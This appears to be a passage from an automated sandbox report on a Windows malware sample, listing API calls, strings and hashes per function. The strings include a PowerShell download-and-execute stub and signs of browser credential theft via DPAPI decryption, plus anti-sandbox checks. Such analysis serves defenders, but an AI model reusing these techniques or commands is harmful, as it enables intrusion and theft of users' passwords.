                                      • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                      • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                      APIs
                                      • lstrcat.KERNEL32(?,006D6D0C), ref: 048D4C92
                                        • Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D4CB8
                                      • lstrcat.KERNEL32(?,?), ref: 048D4CD7
                                      • lstrcat.KERNEL32(?,?), ref: 048D4CEB
                                      • lstrcat.KERNEL32(?,006D6C84), ref: 048D4CFE
                                      • lstrcat.KERNEL32(?,?), ref: 048D4D12
                                      • lstrcat.KERNEL32(?,006D6CC8), ref: 048D4D26
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048D9187: GetFileAttributesA.KERNEL32(00000000,?,048C1DFB,?,?,0042577C,?,?,00420E22), ref: 048D9196
                                        • Part of subcall function 048D4A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 048D4A37
                                        • Part of subcall function 048D4A27: RtlAllocateHeap.NTDLL(00000000), ref: 048D4A3E
                                        • Part of subcall function 048D4A27: wsprintfA.USER32 ref: 048D4A5D
                                        • Part of subcall function 048D4A27: FindFirstFileA.KERNEL32(?,?), ref: 048D4A74
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                      • Instruction ID: aaef013fd0a5e584ad87187e73ea996d36b7ee831bbaaa747a8c62e73c8e38e1
                                      • Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                      • Instruction Fuzzy Hash: CC3153F2D0121867DB14FBB4DC84EE9733DAB58704F444B89B656D6090EAB4ABC8CF91
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                      Strings
                                      • ')", xrefs: 00412F03
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                      • <, xrefs: 00412F89
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                      • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                      • Opcode Fuzzy Hash: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                      • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                      APIs
                                        • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                      • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                      • lstrcatA.KERNEL32(?,02EB2450), ref: 004151FB
                                      • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                        • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                        • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                        • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                        • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                        • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                        • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID: cA
                                      • API String ID: 2667927680-2872761854
                                      • Opcode ID: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                      • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                      • Opcode Fuzzy Hash: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                      • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048C14A5
                                      • __aulldiv.LIBCMT ref: 048C14BF
                                      • __aulldiv.LIBCMT ref: 048C14CD
                                      • ExitProcess.KERNEL32 ref: 048C14FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                      • Instruction ID: 37f080353c42c231ac78abbd088352e946ad64100f1d966326553a278dd0afaa
                                      • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                      • Instruction Fuzzy Hash: 930162B0D45308EAEF10DFD0CC89B9DBBB9AB00709F204A48E605F62C0D6B4A5408B56
                                      APIs
                                      • memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • memcmp.MSVCRT(?,004210FC,00000003), ref: 048CA839
                                      • memset.MSVCRT ref: 048CA872
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 048CA8CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp$AllocLocallstrcpymemset
                                      • String ID: @
                                      • API String ID: 631489823-2766056989
                                      • Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                      • Instruction ID: 04781534379cf8ab7e800ee957477f73c5efb1b6e0d94cd3c7a21b59dfd761d4
                                      • Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                      • Instruction Fuzzy Hash: FA512F3060124C9FDB18DFA8DD95FEC7771AF54308F10861CE90AAB591DBB4BA45CB51
                                      APIs
                                      • strtok_s.MSVCRT ref: 00410FE8
                                      • strtok_s.MSVCRT ref: 0041112D
                                        • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
                                        • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                      • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                      • Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                      • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                        • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                        • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                        • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                        • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                        • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                        • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                        • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                        • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                        • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                        • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                        • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                        • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                        • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                        • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 3731072634-738592651
                                      • Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                      • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                      • Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                      • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValidmemset
                                      • String ID:
                                      • API String ID: 703783727-0
                                      • Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                      • Instruction ID: d159a9f1617b52a05531424056619da66d31cb93d8669ba163eb0369a6d9a3a7
                                      • Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                      • Instruction Fuzzy Hash: 62313830A0A2559BFB259F78CC90379BFE0AF42315F048BBAD891CF191D268F405D751
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: e245770d7b3a2027f25ec2816ac857e703905d58d632ed3249ec05ff9365827c
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: D1218073900A54AEEF319F55CC40D6F7A69EB87B96F014135F91576210D630AD41ABD0
                                      APIs
                                      • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,02EB2270,?,004210F4,?,00000000,?), ref: 00416C0C
                                      • sscanf.NTDLL ref: 00416C39
                                      • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,02EB2270,?,004210F4), ref: 00416C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02EB2270,?,004210F4), ref: 00416C60
                                      • ExitProcess.KERNEL32 ref: 00416C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                      • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                      • Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                      • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 048D6E73
                                      • sscanf.NTDLL ref: 048D6EA0
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 048D6EB9
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 048D6EC7
                                      • ExitProcess.KERNEL32 ref: 048D6EE1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                      • Instruction ID: a61f563d12b0f050af6e29e120ca1038ce743e2f80ff89618db09c6502e48515
                                      • Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                      • Instruction Fuzzy Hash: 1321BAB5D1521DABCF18EFE4E8459EEB7B6BF48300F04852AE416E3250EB74A604CB65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D822E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D8235
                                      • RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 048D8255
                                      • RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 048D8276
                                      • RegCloseKey.ADVAPI32(?), ref: 048D8289
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                      • Instruction ID: 5118023a0a280f7f40176748ee82f18fb0fb79f984443b55a404c66ecfa05f95
                                      • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                      • Instruction Fuzzy Hash: EB118CB1E4520AABDB00DFC5DC49FAFBBB9EB44B10F10421AF611E6280E77469008BA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D7B2B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D7B32
                                      • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,048D7AB0), ref: 048D7B52
                                      • RegQueryValueExA.ADVAPI32(048D7AB0,00420AB4,00000000,00000000,?,000000FF), ref: 048D7B71
                                      • RegCloseKey.ADVAPI32(048D7AB0), ref: 048D7B7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                      • Instruction ID: 878415481174a836aa7e4873c0b2d5e88707a6a4cf2c7fccd209dc94bf422fdc
                                      • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                      • Instruction Fuzzy Hash: C501FFB5E45309BBEB00DBE4DC49FAEB779EF44701F10459AF605A7280E7B0AA00CB91
                                      APIs
                                      • StrStrA.SHLWAPI(02EB5690,00000000,00000000,?,00409F71,00000000,02EB5690,00000000), ref: 004193FC
                                      • lstrcpyn.KERNEL32(006D7580,02EB5690,02EB5690,?,00409F71,00000000,02EB5690), ref: 00419420
                                      • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,02EB5690), ref: 00419437
                                      • wsprintfA.USER32 ref: 00419457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                      • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                      • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                      • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                      APIs
                                      • StrStrA.SHLWAPI(\nm,00000000,00000000,?,048CA1D8,00000000,006D6E5C,00000000), ref: 048D9663
                                      • lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,048CA1D8,00000000,006D6E5C), ref: 048D9687
                                      • lstrlen.KERNEL32(00000000,?,048CA1D8,00000000,006D6E5C), ref: 048D969E
                                      • wsprintfA.USER32 ref: 048D96BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: \nm
                                      • API String ID: 1206339513-1385846026
                                      • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                      • Instruction ID: b999ea00e917bc48381ef622d8d8f211210b24dbc100b30d69006246760dd375
                                      • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                      • Instruction Fuzzy Hash: 67011EB5A05108FFCB04DFA8DD44EAE7B79EF48304F108649F9098B340EA31AA40DB96
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
